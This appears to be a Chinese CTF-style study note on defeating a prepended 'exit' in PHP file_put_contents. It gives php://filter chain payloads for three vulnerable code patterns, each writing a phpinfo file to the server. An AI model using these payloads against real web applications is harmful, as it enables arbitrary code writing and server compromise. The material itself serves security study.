file_put_contents与死亡exit的组合的情况目前有三种:
file_put_contents($filename, "<?php exit();".$content);
file_put_contents($content, "<?php exit();".$content);
file_put_contents($filename, $content . "\n114514");
绕过方式其实都类似,利用单个filter或filterchain进行无关代码的分解
string.strip_tags 去除html xml php标签
convert.base64-encode/decode base64编解码
string.rot13 rot13对英文字符进行回转替换
convert.iconv.UCS-2LE.UCS-2BE 当前字符UCS-2 Little-Endian转为目标字符UCS-2 Big-Endian 即每2位字符逆置
convert.iconv.UCS-4LE.UCS-4BE 每4位字符逆置
convert.iconv.utf-8.utf-7 utf-8转utf-7,对数字英文无影响
zlib.deflate/inflate zlib压缩/解压
.htaccess的预包含
情况一
<?php
$filename = "";
$content = "";
file_put_contents($filename, "<?php exit();".$content);
?>
base64-decode:
$filename = "php://filter/convert.base64-decode/resource=phpinfo.php";
$content = "aPD9waHAgcGhwaW5mbygpOz8+";
strip_tags+base64-decode:
$filename = "php://filter/string.strip_tags|convert.base64-decode/resource=phpinfo.php";
$content = "?>PD9waHAgcGhwaW5mbygpOz8+";
情况二
<?php
$content = "";
file_put_contents($content, "<?php exit();".$content);
?>
UCS-2LE.UCS-2BE:
$content = "php://filter/convert.iconv.UCS-2LE.UCS-2BE|?<hp phpipfn(o;)>?/resource=phpinfo.php";
utf-8.utf-7+base64-decode:
$content = "php://filter/write=PD9waHAgcGhwaW5mbygpOz8+|convert.iconv.utf-8.utf-7|convert.base64-decode/resource=phpinfo.php";
情况三
<?php
$filename = "";
$content = "";
file_put_contents($filename, $content . "\n114514");
?>
如果没有任何限制则直接写入php代码,后缀部分不会影响命令执行:
$filename = "phpinfo.php";
$content = "<?php phpinfo();?>";
参考资料: